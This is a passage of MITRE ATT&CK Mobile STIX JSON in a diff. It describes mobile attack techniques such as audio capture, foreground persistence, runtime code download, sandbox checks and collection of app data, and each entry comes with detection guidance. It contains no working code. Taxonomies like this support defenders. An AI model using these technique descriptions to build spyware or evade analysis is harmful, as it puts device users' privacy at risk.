In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--62adb627-f647-498e-b4cc-41499361bacb", + "created": "2017-10-25T14:48:20.727Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1435", + "url": "https://attack.mitre.org/techniques/T1435" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.", + "modified": "2022-04-01T12:50:48.453Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Calendar Entries", + "x_mitre_detection": "On both Android (6.0 and up) and iOS, the user can view which applications have permission to access calendar information through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "phase_name": "collection", + "kill_chain_name": "mitre-mobile-attack" + } + ], + 
"x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3", + "created": "2017-10-25T14:48:21.354Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1465", + "url": "https://attack.mitre.org/techniques/T1465" + }, + { + "source_name": "Kaspersky-DarkHotel", + "url": "https://blog.kaspersky.com/darkhotel-apt/6613/", + "description": "Alex Drozhzhin. (2014, November 10). Darkhotel: a spy campaign in luxury Asian hotels. Retrieved December 24, 2016." + }, + { + "source_name": "NIST-SP800153", + "url": "http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf", + "description": "M. Souppaya and K. Scarfone. (2012, February). NIST SP 800-153 Guidelines for Securing Wireless Local Area Networks (WLANs). Retrieved December 24, 2016." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "LPN-0" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).", + "modified": "2022-04-06T15:51:11.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Rogue Wi-Fi Access Points", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:54:25.564Z", + "name": "Foreground Persistence", + "description": "Adversaries may abuse Android's `startForeground()` API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android’s `startForeground()` API method. This informs the system that the user is actively interacting with the application, and it should not be killed. 
The only requirement to start a foreground service is showing a persistent notification to the user.(Citation: Android-ForegroundServices)\n\nMalicious applications may abuse the `startForeground()` API method to continue running in the foreground, while presenting a notification to the user pretending to be a genuine application. This would allow unhindered access to the device’s sensors, assuming permission has been previously granted.(Citation: BlackHat Sutter Android Foreground 2019)\n\nMalicious applications may also abuse the `startForeground()` API to inform the Android system that the user is actively interacting with the application, thus preventing it from being killed by the low memory killer.(Citation: TrendMicro-Yellow Camera)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can see persistent notifications in their notification drawer and can subsequently uninstall applications that do not belong. Applications could be vetted for their use of the `startForeground()` API, and could be further scrutinized if usage is found.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "created": "2019-11-19T17:32:20.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1541", + "external_id": "T1541" + }, + { + "source_name": "Android-SensorsOverview", + "description": "Google. (n.d.). 
Sensors Overview. Retrieved November 19, 2019.", + "url": "https://developer.android.com/guide/topics/sensors/sensors_overview#sensors-practices" + }, + { + "source_name": "Android-ForegroundServices", + "description": "Google. (n.d.). Services overview. Retrieved November 19, 2019.", + "url": "https://developer.android.com/guide/components/services.html#Foreground" + }, + { + "source_name": "TrendMicro-Yellow Camera", + "description": "Song Wang. (2019, October 18). Fake Photo Beautification Apps on Google Play can Read SMS Verification Code to Trigger Wireless Application Protocol (WAP)/Carrier Billing. Retrieved November 19, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/fake-photo-beautification-apps-on-google-play-can-read-sms-verification-code-to-trigger-wireless-application-protocol-wap-carrier-billing/" + }, + { + "source_name": "BlackHat Sutter Android Foreground 2019", + "description": "Thomas Sutter. (2019, December). Simple Spyware Androids Invisible Foreground Services and How to (Ab)use Them. 
Retrieved December 26, 2019.", + "url": "https://i.blackhat.com/eu-19/Thursday/eu-19-Sutter-Simple-Spyware-Androids-Invisible-Foreground-Services-And-How-To-Abuse-Them.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html", + "external_id": "APP-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "created": "2017-10-25T14:48:23.233Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1458", + "url": "https://attack.mitre.org/techniques/T1458" + }, + { + "source_name": "Krebs-JuiceJacking", + "url": "http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/", + "description": "Brian Krebs. (2011, August 17). Beware of Juice-Jacking. Retrieved December 23, 2016." + }, + { + "source_name": "GoogleProjectZero-OATmeal", + "url": "https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.html", + "description": "Jann Horn. (2018, September 10). OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB. Retrieved September 18, 2018." + }, + { + "source_name": "Lau-Mactans", + "url": "https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf", + "description": "Lau et al.. (2013). Mactans: Injecting Malware Into iOS Devices Via Malicious Chargers. Retrieved December 23, 2016." 
+ }, + { + "source_name": "Computerworld-iPhoneCracking", + "url": "https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.html", + "description": "Lucas Mearian. (2018, May 9). Two vendors now sell iPhone cracking technology – and police are buying. Retrieved September 21, 2018." + }, + { + "source_name": "IBM-NexusUSB", + "url": "https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/", + "description": "Roee Hay. (2017, January 5). Android Vulnerabilities: Attacking Nexus 6 and 6P Custom Boot Modes. Retrieved January 11, 2017." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "PHY-1" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "PHY-2" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-6.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-6" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may move onto devices by exploiting or copying malware to devices connected via USB. 
In the case of Lateral Movement, adversaries may utilize the physical connection of a device to a compromised or malicious charging station or PC to bypass application store requirements and install malicious applications directly.(Citation: Lau-Mactans) In the case of Initial Access, adversaries may attempt to exploit the device via the connection to gain access to data stored on the device.(Citation: Krebs-JuiceJacking) Examples of this include: \n \n* Exploiting insecure bootloaders in a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location.(Citation: IBM-NexusUSB) \n* Exploiting weakly-enforced security boundaries in Android devices such as the Google Pixel 2 over USB.(Citation: GoogleProjectZero-OATmeal) \n* Products from Cellebrite and Grayshift purportedly that can exploit some iOS devices using physical access to the data port to unlock the passcode.(Citation: Computerworld-iPhoneCracking) ", + "modified": "2022-04-08T15:53:11.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Replication Through Removable Media", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "phase_name": "initial-access", + "kill_chain_name": "mitre-mobile-attack" + }, + { + "phase_name": "lateral-movement", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T13:31:29.924Z", + "name": "Audio Capture", + "description": "Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device. 
Examples of audio information adversaries may target include user conversations, surroundings, phone calls, or other sensitive information. \n\n \n\nAndroid and iOS, by default, require that applications request device microphone access from the user. \n\n \n\nOn Android devices, applications must hold the `RECORD_AUDIO` permission to access the microphone or the `CAPTURE_AUDIO_OUTPUT` permission to access audio output. Because Android does not allow third-party applications to hold the `CAPTURE_AUDIO_OUTPUT` permission by default, only privileged applications, such as those distributed by Google or the device vendor, can access audio output.(Citation: Android Permissions) However, adversaries may be able to gain this access after successfully elevating their privileges. With the `CAPTURE_AUDIO_OUTPUT` permission, adversaries may pass the `MediaRecorder.AudioSource.VOICE_CALL` constant to `MediaRecorder.setAudioOutput`, allowing capture of both voice call uplink and downlink.(Citation: Manifest.permission) \n\n \n\nOn iOS devices, applications must include the `NSMicrophoneUsageDescription` key in their `Info.plist` file to access the microphone.(Citation: Requesting Auth-Media Capture)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. 
However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)\n\n\nIn Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators)\n \n\nAndroid applications using the `RECORD_AUDIO` permission and iOS applications using `RequestRecordPermission` should be carefully reviewed and monitored. If the `CAPTURE_AUDIO_OUTPUT` permission is found in a third-party Android application, the application should be heavily scrutinized. \n\n \n\nIn both Android (6.0 and up) and iOS, users can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "3.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "created": "2017-10-25T14:48:12.913Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1429", + "external_id": "T1429" + }, + { + "source_name": "Manifest.permission", + "description": "Android Developers. (2022, March 17). Voice Call. Retrieved April 1, 2022.", + "url": "https://developer.android.com/reference/android/media/MediaRecorder.AudioSource#VOICE_CALL" + }, + { + "source_name": "Requesting Auth-Media Capture", + "description": "Apple Developers. (n.d.). Requesting Authorization for Media Capture on iOS. 
Retrieved April 1, 2022.", + "url": "https://developer.apple.com/documentation/avfoundation/cameras_and_media_capture/requesting_authorization_for_media_capture_on_ios" + }, + { + "source_name": "Android Permissions", + "description": "Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.", + "url": "https://developer.android.com/reference/android/Manifest.permission" + }, + { + "source_name": "Android Privacy Indicators", + "description": "Google. (n.d.). Privacy Indicators. Retrieved April 20, 2022.", + "url": "https://source.android.com/devices/tech/config/privacy-indicators" + }, + { + "source_name": "iOS Mic Spyware", + "description": "ZecOps Research Team. (2021, November 4). How iOS Malware Can Spy on Users Silently. Retrieved April 1, 2022.", + "url": "https://blog.zecops.com/research/how-ios-malware-can-spy-on-users-silently/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html", + "external_id": "APP-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:59:46.686Z", + "name": "Hijack Execution Flow", + "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time. \n\nThere are many ways an adversary may hijack the flow of execution. A primary way is by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. 
Locations where the operating system looks for programs or resources, such as file directories, could also be poisoned to include malicious payloads.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile threat defense agents could detect unauthorized operating system modifications by using attestation.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "created": "2022-03-30T14:49:18.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1625", + "external_id": "T1625" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:41:18.389Z", + "name": "Unix Shell", + "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the underlying command prompts on Android and iOS devices. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges that are only accessible if the device has been rooted or jailbroken. \n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. 
Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems. \n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence. \n\nIf the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line activities can potentially be detected through Mobile Threat Defense integrations with lower-level OS APIs. 
This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\n\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "created": "2022-03-30T13:59:50.479Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1623/001", + "external_id": "T1623.001" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. 
Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673", + "created": "2017-10-25T14:48:33.158Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1437", + "url": "https://attack.mitre.org/techniques/T1437" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the mobile device, and often the results of those commands, will be embedded within the protocol traffic between the mobile device and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS.", + "modified": "2022-04-19T20:03:51.831Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Application Layer Protocol", + "x_mitre_detection": "Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. 
Enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--6b846ad0-cc20-4db6-aa34-91561397c5e2", + "type": "attack-pattern", + "created": "2017-10-25T14:48:11.861Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1431", + "external_id": "T1431" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "App Delivered via Web Download", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:21:59.494Z", + "name": "Download New Code at Runtime", + "description": "Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) techniques, detecting malicious code downloaded after installation could be difficult.\n\nOn Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView’s `JavascriptInterface` capability. \n\nOn iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. 
(Citation: FireEye-JSPatch) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Existing network infrastructure may detect network calls to known malicious domains or the transfer of malicious payloads over the network. Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of `DexClassLoader`, `System.load`, or the WebView `JavaScriptInterface` capability; on iOS, use of JSPatch or similar capabilities). Unfortunately, this is only a partial mitigation, as additional scrutiny would still need to be applied to applications that use these techniques. These techniques are often used without malicious intent, and applications may employ other techniques to hide their use of these techniques.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.4", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "created": "2017-10-25T14:48:14.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1407", + "external_id": "T1407" + }, + { + "source_name": "FireEye-JSPatch", + "description": "Jing Xie, Zhaofeng Chen, Jimmy Su. (2016, January 27). HOT OR NOT? THE BENEFITS AND RISKS OF IOS REMOTE HOT PATCHING. 
Retrieved December 9, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/hot_or_not_the_bene.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html", + "external_id": "APP-20" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a", + "created": "2017-10-25T14:48:21.023Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1468", + "url": "https://attack.mitre.org/techniques/T1468" + }, + { + "source_name": "Krebs-Location", + "url": "https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/", + "description": "Brian Krebs. (2018, May 17). Tracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site. Retrieved November 8, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-5" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "EMM-7" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. 
Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.(Citation: Krebs-Location)", + "modified": "2022-04-05T19:40:25.068Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Remotely Track Device Without Authorization", + "x_mitre_detection": "Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:51:04.432Z", + "name": "System Checks", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behavior after checking for the presence of artifacts indicative of a virtual environment or sandbox. If the adversary detects a virtual environment, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the implant. They may also search for virtualization artifacts before dropping secondary or additional payloads. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nHardware checks, such as the presence of motion sensors, could also be used to gather evidence that can be indicative a virtual environment. 
Adversaries may also query for specific readings from these devices. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for applications attempting to get `android.os.SystemProperties` or `getprop` with the runtime `exec()` commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "created": "2022-03-30T17:53:35.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1633/001", + "external_id": "T1633.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:53:16.029Z", + "name": "Stored Application Data", + "description": "Adversaries may try to access and collect application data resident on the device. Adversaries often target popular applications, such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019) \n\n \n\nDue to mobile OS sandboxing, this technique is only possible in three scenarios: \n\n \n\n* An application stores files in unprotected external storage \n* An application stores files in its internal storage directory with insecure permissions (e.g. 
777) \n* The adversary gains root permissions on the device ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "3.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "created": "2017-10-25T14:48:15.402Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1409", + "external_id": "T1409" + }, + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html", + "external_id": "AUT-0" + } + ], + "object_marking_refs": [ + 